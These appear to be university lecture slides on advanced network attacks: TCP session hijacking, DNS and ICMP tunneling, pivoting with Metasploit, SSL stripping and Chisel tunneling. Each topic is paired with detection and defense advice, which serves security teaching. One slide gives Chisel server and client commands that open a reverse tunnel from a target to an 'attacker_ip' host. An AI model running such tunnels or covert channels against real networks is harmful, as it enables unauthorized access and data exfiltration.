Week 10: Networking Hacking III – Advanced Network Exploits and Covert Techniques

Lecture Objectives

By the end of this session, students will be able to:

• Understand how TCP session hijacking undermines secure

communication.

• Explain how DNS tunneling enables covert communication.

• Describe how ICMP is leveraged for stealthy data exfiltration.

• Conduct pivoting to access segmented internal networks.

• Propose effective defenses and detection strategies against these

advanced threats.
What Makes an Attack "Advanced"?

• Involves protocol manipulation or covert methods not typically covered in

entry-level attacks.

• Exploits the behavior of trusted network protocols.

• Often used in persistent threat models (APT) or red team simulations.

• Typically used after initial access to perform lateral movement or

exfiltration without detection.
TCP Protocol Refresher

• TCP ensures ordered, reliable delivery of packets.

• Uses a 3-way handshake: SYN, SYN-ACK, ACK.

• Each connection maintains state through sequence and

acknowledgment numbers.

• Attackers can exploit sequence prediction or manipulate the flow

of the TCP session.
TCP Session Hijacking Overview

• An attack where an adversary takes control of a legitimate TCP session.

• Requires capturing or predicting sequence numbers to inject data.

• Common in unsecured or plaintext sessions (e.g., Telnet).

• Hijacker can issue commands or capture responses undetected.

Types of Session Hijacking

• Blind Hijacking: Attacker doesn't see response traffic but injects

commands.

• Active Hijacking: Full visibility of both directions, more effective but

requires MITM.

• TCP Reset Attacks: Sends spoofed RST packets to disrupt connections.

Sequence Number Prediction

• Early TCP/IP implementations used sequential or predictable

Initial Sequence Numbers (ISNs).

• If attacker can guess the ISN, they can spoof a session.

• Modern systems use randomized ISNs, but some embedded

devices and IoT systems still vulnerable.
Tool Highlight: Hunt

• Hunt is a command-line session hijacking tool.

• Supports watching sessions, injecting data, and desynchronizing targets.

• Requires network-level access and promiscuous NIC mode.

• Ideal for testing legacy systems or unencrypted protocols.

Defenses Against TCP Hijacking

• Prefer secure protocols (e.g., SSH over Telnet).

• Implement short session expiration policies.

• Use session binding to IP and fingerprint client parameters.

• Monitor for sudden session termination or duplicate ACKs.

DNS Tunneling Introduction

• DNS typically allowed through firewalls and proxies.

• DNS tunneling uses this to sneak data or commands through DNS

queries.

• Can serve as a Command-and-Control (C2) channel for malware.

How DNS Tunneling Works

• Attacker owns authoritative name server for malicious domain.

• Victim encodes data (e.g., base64) into subdomain queries.

• Attacker decodes received queries and can reply with instructions.

• Tools often use TXT or NULL DNS records.

DNS Tunneling Tool: Iodine

• Tunnels IP traffic over DNS protocol.

• Works even when other ports are blocked.

• Encodes IP packets into DNS queries.

• Supports authentication and compression for stealth and performance.

Setting Up Iodine (Overview)

• Buy domain and configure NS to point to attacker server.

• Run iodine server on VPS (e.g., DigitalOcean).

• Configure firewall and use DNS query logging.

Requires setup on both client and server sides
.Detection of DNS Tunneling

• Analyze DNS logs for long or frequent queries.

• Look for repeated subdomain patterns or entropy in names.

• Correlate DNS traffic with known endpoints and data rates.

• Employ machine learning for DNS anomaly detection.

ICMP Protocol Refresher

• Used for diagnostics (ping = Echo Request and Echo Reply).

• Does not establish a session like TCP.

• Firewalls often permit ICMP for troubleshooting.

• Payload fields in ICMP packets can be manipulated.

ICMP Covert Channels

• Hide commands or data inside ICMP payload.

• Bypass outbound filtering rules.

• Malware may use it to report to C2 servers.

• Can be used for data leakage or keylogging output.

Example: Loki Tool

• Sends shell commands via ICMP Echo Request.

• Returns results via Echo Reply.

• Supports reverse shell and file transfers.

• Highly stealthy on misconfigured or flat networks.

Detection of ICMP Tunneling

• Monitor ICMP packet size and frequency.

• Flag ICMP with unusual payload lengths.

• Block outbound ICMP except to known test hosts.

• Use Suricata/Snort rules to match tunneling patterns.

Introduction to Pivoting

• A post-exploitation technique for lateral movement.

• Used to reach internal networks through a compromised host.

• Simulates an attacker moving through enterprise systems.

• Vital in red teaming and APT simulations.

Types of Pivoting

• Proxy Chaining: Relay traffic via intermediaries.

• VPN Tunnels: Create a virtual network through compromised

host.

• SSH Port Forwarding: Map local/remote ports securely.

• SOCKS Proxies: Dynamically route multiple protocols.

Tool Highlight: Metasploit Pivoting

• Use meterpreter sessions to forward ports and scan internal

subnets.

• Built-in routing functionality.

• portfwd and route commands manage tunnels.

• Enables attacks that mimic insider threat.

Practical Use Case of Pivoting

• Web server in DMZ is compromised.

• Attacker uses it to reach internal database server.

• Database only accessible from DMZ – direct access impossible.

• Enables targeted data extraction or backdoor installation.

Challenges with Pivoting

• Adds latency and potential instability.

• Risk of detection due to increased traffic or scanning behavior.

• Requires careful coordination of tools and routes.

• Internal segmentation or egress filters may block it.

Advanced MITM: SSL Stripping Revisited

• Uses proxy between client and server.

• Downgrades secure HTTPS to HTTP transparently.

• User sees no warning if not vigilant.

• Credentials and sensitive data intercepted.

Tool: sslstrip

• Transparent proxy tool.

• Rewrites HTTPS links to HTTP.

• Captures form data, sessions, cookies.

• Requires ARP spoofing or DNS spoofing setup.

Countermeasures: HSTS and Certificate Pinning

• HSTS forces browsers to always use HTTPS.

• Certificate pinning ensures only a specific cert is trusted.

• Can prevent proxy-based MITM attacks.

• Widely adopted in modern applications.

Tunneling Through HTTP/HTTPS

• Using web protocols to mask traffic.

• CONNECT method in HTTP proxies enables TCP tunnels.

• Malware can leverage it to reach C2 servers.

• Effective in restricted corporate environments.

Tool: Chisel (TCP Tunneling over HTTP)

• Go-based reverse proxy tool.

• Lightweight and simple to use.

• Enables attackers to bridge internal ports to external systems.

• Commonly used for pivoting and remote file transfer.

Chisel Setup Example

• Server: chisel server -p 8000 --reverse (on attacker machine).

• Client: chisel client attacker_ip:8000 R:localhost:8001 (on target).

• Enables remote access to localhost:8001 via HTTP tunnel.

Detection and Prevention Strategies

• Implement strong egress filtering (restrict DNS, ICMP, HTTP).

• Deploy IDS/IPS to monitor unusual protocol behavior.

• Audit internal logs for strange tunneling activity.

• Train staff to recognize phishing and abnormal network behavior.

Legal and Ethical Considerations

• Simulating attacks must be part of a signed engagement.

• Unintentional exposure or data theft can have legal consequences.

• Ensure all tools are used in sandboxed, authorized labs.

• Focus on learning and responsible application.

Summary: Key Concepts

• TCP, DNS, and ICMP can all be covertly manipulated.

• Hijacking and tunneling provide stealth and persistence.

• Pivoting is crucial for lateral movement post-exploitation.

• Prevention requires defense-in-depth and anomaly monitoring.

References

• Offensive Security – Metasploit Unleashed (https://metasploitunleashed.com)

• Iodine DNS Tunnel Tool: https://code.kryo.se/iodine/

• Bettercap and Chisel GitHub repositories

• NIST SP 800-94: Guide to Intrusion Detection and Prevention Systems

(https://nvlpubs.nist.gov/nistpubs/Legacy/SP/nistspecialpublication800-94.pdf)
THANK YOU
Any Questions ?